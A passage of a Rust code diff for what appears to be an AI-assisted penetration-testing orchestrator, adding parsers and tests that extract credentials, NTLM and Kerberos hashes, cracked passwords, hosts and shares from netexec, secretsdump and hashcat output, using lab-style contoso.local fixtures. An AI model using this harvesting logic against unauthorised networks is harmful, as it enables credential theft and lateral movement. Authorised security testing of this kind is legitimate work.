RE_SMB_BANNER_OS: LazyLock = + LazyLock::new(|| Regex::new(r"^\s*([^(]+?)\s+\(name:").unwrap()); + +static RE_SMB_SIMPLE: LazyLock = LazyLock::new(|| { + Regex::new(r"^SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+([A-Za-z0-9_\-]+)\s+").unwrap() +}); + +pub fn extract_hosts(output: &str) -> Vec { + let mut hosts = Vec::new(); + let mut seen = std::collections::HashSet::new(); + + for line in output.lines() { + let stripped = line.trim(); + + // Banner line with OS info: SMB IP PORT HOST [*] details + if let Some(caps) = RE_SMB_BANNER.captures(stripped) { + let ip = caps.get(1).unwrap().as_str().to_string(); + if !seen.insert(ip.clone()) { + continue; + } + let details = caps.get(3).unwrap().as_str(); + let netbios_name = RE_SMB_BANNER_NAME + .captures(details) + .map(|c| c.get(1).unwrap().as_str().to_string()) + .unwrap_or_default(); + let domain = RE_SMB_BANNER_DOMAIN + .captures(details) + .map(|c| { + // netexec appends trailing artifacts like "0." — strip them + c.get(1) + .unwrap() + .as_str() + .trim_end_matches("0.") + .trim_end_matches('.') + .to_string() + }) + .unwrap_or_default(); + let os = RE_SMB_BANNER_OS + .captures(details) + .map(|c| c.get(1).unwrap().as_str().trim().to_string()) + .unwrap_or_default(); + + let hostname = + if !netbios_name.is_empty() && !domain.is_empty() && !netbios_name.contains('.') { + format!("{}.{}", netbios_name.to_lowercase(), domain.to_lowercase()) + } else { + netbios_name + }; + + let is_dc = details.contains("(signing:True)"); + let mut roles = Vec::new(); + if is_dc { + roles.push("AD DC".to_string()); + } + + hosts.push(Host { + ip, + hostname, + os, + roles, + services: vec![], + is_dc, + owned: false, + }); + continue; + } + + // Fallback simple line + if let Some(caps) = RE_SMB_SIMPLE.captures(stripped) { + let ip = caps.get(1).unwrap().as_str().to_string(); + let host_col = caps.get(2).unwrap().as_str(); + // Skip table header words + let skip = ["share", "name", "permissions", "remark"]; + if skip.contains(&host_col.to_lowercase().as_str()) { + continue; + } + if seen.insert(ip.clone()) { + hosts.push(Host { + ip, + hostname: host_col.to_string(), + os: String::new(), + roles: vec![], + services: vec![], + is_dc: false, + owned: false, + }); + } + } + } + + hosts +} diff --git a/ares-cli/src/orchestrator/output_extraction/mod.rs b/ares-cli/src/orchestrator/output_extraction/mod.rs new file mode 100644 index 00000000..e428dcf2 --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/mod.rs @@ -0,0 +1,160 @@ +//! Regex-based extraction of discoveries from raw tool output text. +//! +//! This is the orchestrator-level safety net that mirrors Python's +//! `_process_output_text()` in `result_processing.py`. It parses raw +//! text from task results to catch credentials, hashes, hosts, shares, +//! and users that the per-tool parsers or LLM may have missed. +//! +//! The per-tool parsers in `ares_tools::parsers` are the primary extraction +//! mechanism (they run at tool-call time). This module runs on the full task +//! result text as a secondary pass. + +mod hashes; +mod hosts; +mod passwords; +mod shares; +#[cfg(test)] +mod tests; +mod users; + +use regex::Regex; +use std::sync::LazyLock; + +use ares_core::models::{Credential, Hash, Host, Share, User}; + +pub use hashes::{extract_cracked_passwords, extract_hashes}; +pub use hosts::extract_hosts; +pub use passwords::extract_plaintext_passwords; +pub use shares::extract_shares; +pub use users::extract_users; + +/// Strip ANSI escape sequences from text (e.g., color codes from tool output). +pub(crate) fn strip_ansi(s: &str) -> String { + static RE: LazyLock = LazyLock::new(|| Regex::new(r"\x1b\[[0-9;]*m").unwrap()); + RE.replace_all(s, "").into_owned() +} + +/// All discoveries extracted from raw output text. +#[derive(Debug, Default)] +pub struct TextExtractions { + pub credentials: Vec, + pub hashes: Vec, + pub hosts: Vec, + pub users: Vec, + pub shares: Vec, +} + +impl TextExtractions { + pub fn is_empty(&self) -> bool { + self.credentials.is_empty() + && self.hashes.is_empty() + && self.hosts.is_empty() + && self.users.is_empty() + && self.shares.is_empty() + } +} + +/// Extract all discoverable entities from raw output text. +/// +/// Runs all extraction passes and returns the combined results. +pub fn extract_from_output_text(output: &str, default_domain: &str) -> TextExtractions { + let mut result = TextExtractions::default(); + if output.is_empty() { + return result; + } + + result.hosts = extract_hosts(output); + result.users = extract_users(output, default_domain); + result.credentials = extract_plaintext_passwords(output, default_domain); + result.shares = extract_shares(output); + result.hashes = extract_hashes(output, default_domain); + + let cracked = extract_cracked_passwords(output, default_domain); + result.credentials.extend(cracked); + + result +} + +/// Validate a credential pair — matches Python's add_credential() rejection checks. +pub(crate) fn is_valid_credential(username: &str, password: &str) -> bool { + if username.is_empty() || password.is_empty() { + return false; + } + if username.contains('/') || username.contains('\\') || username.ends_with(".txt") { + return false; + } + if password.contains('/') || password.contains('\\') || password.ends_with(".txt") { + return false; + } + let user_lower = username.to_lowercase(); + if matches!(user_lower.as_str(), "(none)" | "none" | "null" | "(null)") { + return false; + } + let user_upper = username.to_uppercase(); + if user_upper.starts_with("EVIL") && user_upper.ends_with('$') { + let middle = &user_upper[4..user_upper.len() - 1]; + if middle.chars().all(|c| c.is_ascii_digit()) { + return false; + } + } + let pw_lower = password.to_lowercase(); + if matches!( + pw_lower.as_str(), + "(null)" + | "(null:null)" + | "*blank*" + | "" + | "n/a" + | "[+]" + | "[-]" + | "password" + | "no" + | "yes" + | "true" + | "false" + | "unknown" + | "none" + | "null" + | "fail" + | "failed" + | "error" + | "status" + | "success" + | "enabled" + | "disabled" + | "required" + | "allowed" + | "denied" + ) { + return false; + } + if password.len() < 3 { + return false; + } + if password.len() > 128 { + return false; + } + if password.len() > 40 && password.chars().all(|c| c.is_ascii_hexdigit() || c == '$') { + return false; + } + true +} + +pub(crate) fn make_credential( + username: &str, + password: &str, + domain: &str, + source: &str, +) -> Credential { + Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: password.to_string(), + domain: domain.to_string(), + source: source.to_string(), + discovered_at: Some(chrono::Utc::now()), + is_admin: false, + parent_id: None, + attack_step: 0, + } +} diff --git a/ares-cli/src/orchestrator/output_extraction/passwords.rs b/ares-cli/src/orchestrator/output_extraction/passwords.rs new file mode 100644 index 00000000..2d06a50a --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/passwords.rs @@ -0,0 +1,178 @@ +use regex::Regex; +use std::sync::LazyLock; + +use ares_core::models::Credential; + +use super::users::{RE_ACCOUNT, RE_DOMAIN_BACKSLASH, RE_UPN, RE_USER_BRACKET}; +use super::{is_valid_credential, make_credential}; + +static RE_DEFAULT_PASSWORD_CRED: LazyLock = + LazyLock::new(|| Regex::new(r"^([^\\]+)\\([^:]+):(.+)$").unwrap()); + +static RE_PASSWORD_VALUE: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)Password\s*:\s*([^\s)]+)").unwrap()); + +static RE_SMB_TIMESTAMP_PASSWORD: LazyLock = LazyLock::new(|| { + Regex::new( + r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}.*(?i)Password\s*:\s*", + ) + .unwrap() +}); + +/// General nxc SMB line with a username field followed eventually by "Password": +/// `SMB IP PORT HOST username ... Password : xxx` +/// Broader than RE_SMB_TIMESTAMP_PASSWORD — doesn't require a timestamp. +static RE_SMB_LINE_PASSWORD: LazyLock = LazyLock::new(|| { + Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+.*(?i)Password\s*:\s*").unwrap() +}); + +/// Netexec [+] success line: `SMB IP PORT HOST [+] DOMAIN\user:password` +static RE_NETEXEC_SUCCESS: LazyLock = LazyLock::new(|| { + Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap() +}); + +pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec { + let mut credentials = Vec::new(); + let mut seen = std::collections::HashSet::new(); + + const FAILURE_MARKERS: &[&str] = &[ + "STATUS_LOGON_FAILURE", + "STATUS_PASSWORD_EXPIRED", + "STATUS_PASSWORD_MUST_CHANGE", + "STATUS_ACCOUNT_LOCKED_OUT", + "STATUS_ACCOUNT_DISABLED", + "STATUS_ACCOUNT_RESTRICTION", + "STATUS_NO_LOGON_SERVERS", + "STATUS_ACCESS_DENIED", + "STATUS_INVALID_LOGON_HOURS", + "STATUS_INVALID_WORKSTATION", + "LOGON FAILURE", + "LOGON_FAILURE", + "ACCESS_DENIED", + // Guest fallback — SMB accepted the connection but mapped it to the + // built-in Guest account. The supplied password was NOT validated. + "(GUEST)", + ]; + + for line in output.lines() { + let stripped = line.trim(); + if !stripped.contains("[+]") { + continue; + } + let upper = stripped.to_uppercase(); + if FAILURE_MARKERS.iter().any(|m| upper.contains(m)) { + continue; + } + if let Some(caps) = RE_NETEXEC_SUCCESS.captures(stripped) { + let domain = caps.get(1).unwrap().as_str().to_string(); + let user = caps.get(2).unwrap().as_str().to_string(); + let pass = caps + .get(3) + .unwrap() + .as_str() + .trim_end_matches("(Pwn3d!)") + .trim() + .to_string(); + if is_valid_credential(&user, &pass) { + let key = format!("{}\\{}:{}", domain, user, pass); + if seen.insert(key) { + credentials.push(make_credential(&user, &pass, &domain, "netexec_auth")); + } + } + } + } + let mut current_domain = default_domain.to_string(); + let mut expecting_default_password = false; + + let lines: Vec<&str> = output.lines().collect(); + for line in &lines { + let stripped = line.trim(); + + // DefaultPassword block + if stripped.contains("[*] DefaultPassword") { + expecting_default_password = true; + continue; + } + + if expecting_default_password { + expecting_default_password = false; + if let Some(caps) = RE_DEFAULT_PASSWORD_CRED.captures(stripped) { + let domain = caps.get(1).unwrap().as_str().to_string(); + let user = caps.get(2).unwrap().as_str().to_string(); + let pass = caps.get(3).unwrap().as_str().to_string(); + if is_valid_credential(&user, &pass) { + let key = format!("{}\\{}:{}", domain, user, pass); + if seen.insert(key) { + credentials.push(make_credential( + &user, + &pass, + &domain, + "autologon_registry", + )); + } + } + continue; + } + } + + // Track current domain context (for dedup key and credential domain). + // Only domain is tracked — username tracking was removed to prevent + // stale-context misattribution (LDAP doesn't guarantee attribute order). + if let Some(caps) = RE_DOMAIN_BACKSLASH.captures(stripped) { + current_domain = caps.get(1).unwrap().as_str().to_string(); + } else if let Some(caps) = RE_UPN.captures(stripped) { + current_domain = caps.get(2).unwrap().as_str().to_string(); + } + + // Password extraction (only on lines containing "password") + if !stripped.to_lowercase().contains("password") { + continue; + } + + if let Some(caps) = RE_PASSWORD_VALUE.captures(stripped) { + let password = caps + .get(1) + .unwrap() + .as_str() + .trim_end_matches(|c| ".,;:()".contains(c)) + .trim_matches('\'') + .trim_matches('"') + .to_string(); + + // Extract username from the SAME line only. Never fall back to + // current_user — LDAP doesn't guarantee attribute order, so + // description may appear before sAMAccountName within an entry, + // causing stale current_user from a previous entry to be + // misattributed (e.g. john.smith:Summer2025 instead of + // sam.wilson:Summer2025). Per-tool parsers handle structured + // extraction; this safety net only catches same-line patterns. + let username = if let Some(smb_caps) = RE_SMB_TIMESTAMP_PASSWORD.captures(stripped) { + smb_caps.get(1).unwrap().as_str().to_string() + } else if let Some(smb_caps) = RE_SMB_LINE_PASSWORD.captures(stripped) { + smb_caps.get(1).unwrap().as_str().to_string() + } else if let Some(acct_caps) = RE_ACCOUNT.captures(stripped) { + acct_caps.get(1).unwrap().as_str().to_string() + } else if let Some(bracket_caps) = RE_USER_BRACKET.captures(stripped) { + bracket_caps.get(1).unwrap().as_str().to_string() + } else { + // No same-line username found — skip this password. + // The per-tool parser handles structured extraction. + continue; + }; + + if !username.is_empty() && is_valid_credential(&username, &password) { + let key = format!("{}\\{}:{}", current_domain, username, password); + if seen.insert(key) { + credentials.push(make_credential( + &username, + &password, + ¤t_domain, + "description_field", + )); + } + } + } + } + + credentials +} diff --git a/ares-cli/src/orchestrator/output_extraction/shares.rs b/ares-cli/src/orchestrator/output_extraction/shares.rs new file mode 100644 index 00000000..99556643 --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/shares.rs @@ -0,0 +1,80 @@ +use regex::Regex; +use std::sync::LazyLock; + +use ares_core::models::Share; + +static RE_SMB_IP: LazyLock = + LazyLock::new(|| Regex::new(r"^SMB\s+(\d+\.\d+\.\d+\.\d+)\s+").unwrap()); + +static RE_SMB_PREFIX: LazyLock = + LazyLock::new(|| Regex::new(r"^SMB\s+\S+\s+\d+\s+\S+\s+").unwrap()); + +pub fn extract_shares(output: &str) -> Vec { + let mut shares = Vec::new(); + let mut seen = std::collections::HashSet::new(); + let mut current_ip = String::new(); + let mut in_table = false; + let valid_perms = ["read", "write", "read,write", "write,read"]; + + for line in output.lines() { + let stripped = line.trim(); + + // Track current IP + if let Some(caps) = RE_SMB_IP.captures(stripped) { + current_ip = caps.get(1).unwrap().as_str().to_string(); + } + + // Strip SMB prefix to get body + let body = RE_SMB_PREFIX.replace(stripped, "").to_string(); + let body = body.trim(); + + if body.is_empty() { + continue; + } + + // Detect table header + let body_lower = body.to_lowercase(); + if body_lower.starts_with("share") && body_lower.contains("permission") { + in_table = true; + continue; + } + + // Skip separator lines + if body.chars().all(|c| c == '-' || c == ' ') { + continue; + } + + if in_table && !current_ip.is_empty() { + // Table ends at enumeration summary or empty body + if body.starts_with('[') { + in_table = false; + continue; + } + + // Split on whitespace runs (columns are separated by multiple spaces) + let parts: Vec<&str> = body.split_whitespace().collect(); + if parts.len() >= 2 { + let share_name = parts[0].to_string(); + let perm = parts[1].to_lowercase(); + if valid_perms.contains(&perm.as_str()) { + let comment = if parts.len() >= 3 { + parts[2..].join(" ") + } else { + String::new() + }; + let key = format!("{}:{}", current_ip, share_name); + if seen.insert(key) { + shares.push(Share { + host: current_ip.clone(), + name: share_name, + permissions: perm.to_uppercase(), + comment, + }); + } + } + } + } + } + + shares +} diff --git a/ares-cli/src/orchestrator/output_extraction/tests.rs b/ares-cli/src/orchestrator/output_extraction/tests.rs new file mode 100644 index 00000000..003dc25c --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/tests.rs @@ -0,0 +1,538 @@ +use super::*; + +#[test] +fn test_extract_ntlm_with_domain() { + let output = + "CONTOSO\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "Administrator"); + assert_eq!(hashes[0].domain, "CONTOSO"); + assert_eq!(hashes[0].hash_type, "ntlm"); + assert!(hashes[0] + .hash_value + .contains("e19ccf75ee54e06b06a5907af13cef42")); +} + +#[test] +fn test_extract_ntlm_without_domain() { + let output = + "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "Administrator"); + assert_eq!(hashes[0].domain, "contoso.local"); +} + +#[test] +fn test_extract_tgs_hash() { + let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "svc_sql"); + assert_eq!(hashes[0].domain, "CONTOSO.LOCAL"); + assert_eq!(hashes[0].hash_type, "kerberoast"); +} + +#[test] +fn test_extract_asrep_hash() { + let output = "$krb5asrep$23$jdoe@CONTOSO.LOCAL:abc123def456789012345678901234567890abcdef"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "jdoe"); + assert_eq!(hashes[0].domain, "CONTOSO.LOCAL"); + assert_eq!(hashes[0].hash_type, "asrep"); +} + +#[test] +fn test_extract_line_wrapped_ntlm() { + let output = + "Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75\nee54e06b06a5907af13cef42:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "Administrator"); +} + +#[test] +fn test_extract_hashes_dedup() { + let output = "\ +CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\n\ +CONTOSO\\admin:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::"; + let hashes = extract_hashes(output, "contoso.local"); + assert_eq!(hashes.len(), 1, "Should dedup identical hashes"); +} + +#[test] +fn test_extract_hosts_banner() { + let output = "SMB 192.168.58.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:contoso.local) (signing:True)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].ip, "192.168.58.10"); + assert_eq!(hosts[0].hostname, "dc01.contoso.local"); // FQDN constructed from name+domain + assert!(hosts[0].is_dc); +} + +#[test] +fn test_extract_hosts_banner_fqdn_construction() { + // Verify FQDN is built from (name:X)(domain:Y) → x.y + let output = "SMB 192.168.58.11 445 DC02 [*] Windows Server 2019 (name:DC02) (domain:child.contoso.local) (signing:True)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].hostname, "dc02.child.contoso.local"); + assert!(hosts[0].is_dc); +} + +#[test] +fn test_extract_hosts_banner_domain_trailing_zero() { + // netexec sometimes appends "0." to domain — verify it's stripped + let output = "SMB 192.168.58.11 445 DC02 [*] Windows Server 2019 (name:DC02) (domain:contoso.local0.) (signing:True)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].hostname, "dc02.contoso.local"); +} + +#[test] +fn test_extract_hosts_simple() { + let output = "SMB 192.168.58.20 445 SRV01 some output"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].ip, "192.168.58.20"); + assert_eq!(hosts[0].hostname, "SRV01"); +} + +#[test] +fn test_extract_hosts_dedup() { + let output = "\ +SMB 192.168.58.10 445 DC01 [*] Windows (name:DC01) (domain:contoso.local)\n\ +SMB 192.168.58.10 445 DC01 something else"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1, "Should dedup by IP"); + assert_eq!(hosts[0].hostname, "dc01.contoso.local"); +} + +#[test] +fn test_extract_users_domain_backslash() { + let output = "CONTOSO\\alice.johnson (SidTypeUser)"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "alice.johnson"); + assert_eq!(users[0].domain, "CONTOSO"); +} + +#[test] +fn test_extract_users_upn() { + let output = "Found user: bob@contoso.local"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "bob"); + assert_eq!(users[0].domain, "contoso.local"); +} + +#[test] +fn test_extract_users_rpc_format() { + let output = "user:[admin] rid:[0x1f4]"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "admin"); + assert_eq!(users[0].domain, "contoso.local"); +} + +#[test] +fn test_extract_users_samaccountname() { + let output = "sAMAccountName: svc_sql"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "svc_sql"); +} + +#[test] +fn test_extract_users_skip_machine_accounts() { + let output = "CONTOSO\\DC01$ (SidTypeUser)"; + let users = extract_users(output, "contoso.local"); + assert!( + users.is_empty(), + "Machine accounts (ending in $) should be skipped" + ); +} + +#[test] +fn test_extract_users_skip_anonymous() { + let output = "user:[anonymous] rid:[0x1f5]"; + let users = extract_users(output, "contoso.local"); + assert!(users.is_empty()); +} + +#[test] +fn test_extract_users_smb_timestamp() { + let output = "SMB 192.168.58.10 445 DC01 alice.johnson 2026-03-25 23:21:09 0 Alice"; + let users = extract_users(output, "contoso.local"); + assert!(users.iter().any(|u| u.username == "alice.johnson")); +} + +#[test] +fn test_extract_users_domain_context_propagation() { + let output = "\ +[*] Windows (name:DC01) (domain:north.contoso.local)\n\ +user:[alice] rid:[0x1f4]"; + let users = extract_users(output, "contoso.local"); + let alice = users.iter().find(|u| u.username == "alice").unwrap(); + assert_eq!(alice.domain, "north.contoso.local"); +} + +#[test] +fn test_extract_password_from_description() { + let output = + "SMB 192.168.58.10 445 DC01 dave.miller 2026-03-25 23:22:25 0 Dave Miller (Password : Summer2026!)"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "dave.miller"); + assert_eq!(creds[0].password, "Summer2026!"); +} + +#[test] +fn test_extract_default_password() { + let output = "\ +[*] DefaultPassword\n\ +CONTOSO\\svc_backup:BackupPass123!"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "svc_backup"); + assert_eq!(creds[0].password, "BackupPass123!"); + assert_eq!(creds[0].domain, "CONTOSO"); +} + +#[test] +fn test_extract_password_rejects_paths() { + let output = "Password : /tmp/users.txt"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + assert!(creds.is_empty()); +} + +/// Regression: stale current_user must never be used for password attribution. +/// Previously, CHILD\john.smith on an earlier line would set current_user, and a +/// later "Password: Summer2025" (belonging to sam.wilson) would be falsely +/// attributed to john.smith. +/// +/// Fix: password lines without a same-line username are skipped entirely. +/// Per-tool parsers handle structured extraction (LDIF, nxc table format). +#[test] +fn test_stale_context_does_not_leak_across_passwords() { + // Simulate secretsdump output followed by LDAP description output + let output = "\ +CHILD\\john.smith:1103:aad3b435b51404eeaad3b435b51404ee:abc123def456abc123def456abc123de:::\n\ +Password: Summer2025"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + // The password line has no same-line username, so it must be skipped. + // Per-tool parsers handle the structured extraction correctly. + assert!( + creds.is_empty(), + "bare Password: line must not produce credentials" + ); +} + +/// Regression: LDAP attribute order is NOT guaranteed. +/// description may appear BEFORE sAMAccountName within an entry. +/// extract_plaintext_passwords must never misattribute passwords from +/// a previous entry's username context. +#[test] +fn test_ldif_attribute_order_no_misattribution() { + // ldapsearch output where description comes BEFORE sAMAccountName + // and john.smith's entry appears before sam.wilson's + let output = "\ +# john.smith, Users, child.contoso.local\n\ +dn: CN=John Smith,CN=Users,DC=child,DC=contoso,DC=local\n\ +sAMAccountName: john.smith\n\ +description: John Smith\n\ +userPrincipalName: john.smith@child.contoso.local\n\ +\n\ +# sam.wilson, Users, child.contoso.local\n\ +dn: CN=Sam Wilson,CN=Users,DC=child,DC=contoso,DC=local\n\ +description: Sam Wilson (Password : Summer2025)\n\ +sAMAccountName: sam.wilson\n\ +userPrincipalName: sam.wilson@child.contoso.local"; + + let creds = extract_plaintext_passwords(output, "child.contoso.local"); + // The description line has no same-line username — must be skipped. + // john.smith:Summer2025 must NEVER be produced. + assert!( + creds.is_empty(), + "LDIF description without same-line username must not produce credentials, got: {:?}", + creds + ); +} + +/// nxc SMB lines without timestamps should still extract via RE_SMB_LINE_PASSWORD. +#[test] +fn test_smb_line_without_timestamp() { + let output = + "SMB 192.168.58.10 445 DC01 svc_test 0 Service Account (Password : TestPass!)"; + let creds = extract_plaintext_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "svc_test"); + assert_eq!(creds[0].password, "TestPass!"); +} + +/// Ensure that two separate tool outputs processed independently don't +/// cross-contaminate username context. +#[test] +fn test_separate_outputs_no_cross_contamination() { + // Tool output 1: secretsdump mentions john.smith + let output1 = "CHILD\\john.smith:1103:aad3b435b51404eeaad3b435b51404ee:abc123:::\n"; + // Tool output 2: LDAP description with password for sam.wilson + let output2 = "SMB 192.168.58.22 445 DC02 sam.wilson 2026-04-13 Password: Summer2025"; + + // Process separately (as the fix does) + let creds1 = extract_plaintext_passwords(output1, "contoso.local"); + let creds2 = extract_plaintext_passwords(output2, "contoso.local"); + + // output1 should not produce a plaintext credential (it's a hash line) + assert!(creds1.is_empty()); + + // output2 should attribute Summer2025 to sam.wilson, not john.smith + assert_eq!(creds2.len(), 1); + assert_eq!(creds2[0].username, "sam.wilson"); + assert_eq!(creds2[0].password, "Summer2025"); +} + +#[test] +fn test_extract_shares() { + let output = "\ +SMB 192.168.58.10 445 DC01 Share Permissions Remark\n\ +SMB 192.168.58.10 445 DC01 ----- ----------- ------\n\ +SMB 192.168.58.10 445 DC01 SYSVOL READ Logon server share\n\ +SMB 192.168.58.10 445 DC01 ADMIN$ READ,WRITE\n\ +SMB 192.168.58.10 445 DC01 [*] Enumerated 2 shares"; + let shares = extract_shares(output); + assert_eq!(shares.len(), 2); + assert_eq!(shares[0].name, "SYSVOL"); + assert_eq!(shares[0].permissions, "READ"); + assert_eq!(shares[0].host, "192.168.58.10"); + assert_eq!(shares[1].name, "ADMIN$"); + assert_eq!(shares[1].permissions, "READ,WRITE"); +} + +#[test] +fn test_full_extraction() { + let output = "\ +SMB 192.168.58.10 445 DC01 [*] Windows Server 2019 (name:DC01) (domain:contoso.local) (signing:True)\n\ +SMB 192.168.58.10 445 DC01 [+] contoso.local\\:\n\ +SMB 192.168.58.10 445 DC01 -Username- -Last PW Set- -BadPW- -Description-\n\ +SMB 192.168.58.10 445 DC01 alice 2026-03-25 23:21:09 0 Alice (Password : Welcome1!)\n\ +SMB 192.168.58.10 445 DC01 bob 2026-03-25 23:21:09 0 Bob\n\ +CONTOSO\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:313b6f423a71d74c0a1b8a2f43b22d4c:::"; + + let result = extract_from_output_text(output, "contoso.local"); + assert!(!result.hosts.is_empty(), "Should extract hosts"); + assert!(!result.users.is_empty(), "Should extract users"); + assert!(!result.credentials.is_empty(), "Should extract credentials"); + assert!(!result.hashes.is_empty(), "Should extract hashes"); +} + +#[test] +fn test_empty_output() { + let result = extract_from_output_text("", "contoso.local"); + assert!(result.is_empty()); +} + +#[test] +fn test_extract_netexec_success_credential() { + let output = "\ +SMB 192.168.58.11 445 DC02 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC02) (domain:child.contoso.local) (signing:True)\n\ +SMB 192.168.58.11 445 DC02 [-] child.contoso.local\\admin:admin STATUS_LOGON_FAILURE\n\ +SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe"; + + let result = extract_from_output_text(output, "child.contoso.local"); + assert_eq!(result.credentials.len(), 1); + assert_eq!(result.credentials[0].username, "jdoe"); + assert_eq!(result.credentials[0].password, "jdoe"); + assert_eq!(result.credentials[0].domain, "child.contoso.local"); + assert_eq!(result.credentials[0].source, "netexec_auth"); +} + +#[test] +fn test_extract_netexec_success_with_pwned() { + let output = "SMB 192.168.58.11 445 DC01 [+] contoso.local\\Administrator:P@ssw0rd(Pwn3d!)"; + + let result = extract_from_output_text(output, "contoso.local"); + assert_eq!(result.credentials.len(), 1); + assert_eq!(result.credentials[0].username, "Administrator"); + assert_eq!(result.credentials[0].password, "P@ssw0rd"); +} + +#[test] +fn test_extract_netexec_guest_filtered() { + let output = "\ +SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\admin:admin (Guest)\n\ +SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\jdoe:jdoe (Guest)\n\ +SMB 192.168.58.11 445 DC02 [+] child.contoso.local\\realuser:realpass"; + + let result = extract_from_output_text(output, "child.contoso.local"); + assert_eq!( + result.credentials.len(), + 1, + "Guest lines should be filtered out" + ); + assert_eq!(result.credentials[0].username, "realuser"); + assert_eq!(result.credentials[0].password, "realpass"); +} + +#[test] +fn test_valid_credential_rejects_null_usernames() { + assert!(!is_valid_credential("(none)", "pass")); + assert!(!is_valid_credential("none", "pass")); + assert!(!is_valid_credential("null", "pass")); + assert!(!is_valid_credential("(null)", "pass")); + assert!(!is_valid_credential("(None)", "pass")); +} + +#[test] +fn test_valid_credential_rejects_evil_artifacts() { + assert!(!is_valid_credential("EVIL625686$", "pass")); + assert!(!is_valid_credential("evil12345$", "pass")); + // Non-numeric middle should pass + assert!(is_valid_credential("EVILBOT$", "pass")); +} + +#[test] +fn test_valid_credential_rejects_noise_passwords() { + assert!(!is_valid_credential("user", "(null)")); + assert!(!is_valid_credential("user", "*BLANK*")); + assert!(!is_valid_credential("user", "")); + assert!(!is_valid_credential("user", "N/A")); + assert!(!is_valid_credential("user", "[+]")); + assert!(!is_valid_credential("user", "Password")); + assert!(!is_valid_credential("user", "password")); +} + +#[test] +fn test_valid_credential_accepts_real_passwords() { + assert!(is_valid_credential("admin", "P@ss1")); + assert!(is_valid_credential("jdoe", "jdoe")); + assert!(is_valid_credential("svc_test", "svc_test")); +} + +#[test] +fn test_extract_cracked_tgs_hashcat() { + let output = + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456:Summer2024!"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "svc_sql"); + assert_eq!(creds[0].domain, "CONTOSO.LOCAL"); + assert_eq!(creds[0].password, "Summer2024!"); + assert_eq!(creds[0].source, "cracked:hashcat"); +} + +#[test] +fn test_extract_cracked_asrep_hashcat() { + let output = "$krb5asrep$23$jdoe@CONTOSO.LOCAL:abc123def456:Winter2024!"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "jdoe"); + assert_eq!(creds[0].domain, "CONTOSO.LOCAL"); + assert_eq!(creds[0].password, "Winter2024!"); + assert_eq!(creds[0].source, "cracked:hashcat"); +} + +#[test] +fn test_extract_cracked_john_show() { + let output = "svc_sql:Summer2024!::::::::\n1 password hash cracked, 0 left"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "svc_sql"); + assert_eq!(creds[0].password, "Summer2024!"); + assert_eq!(creds[0].source, "cracked:john"); +} + +#[test] +fn test_extract_cracked_dedup() { + let output = "\ 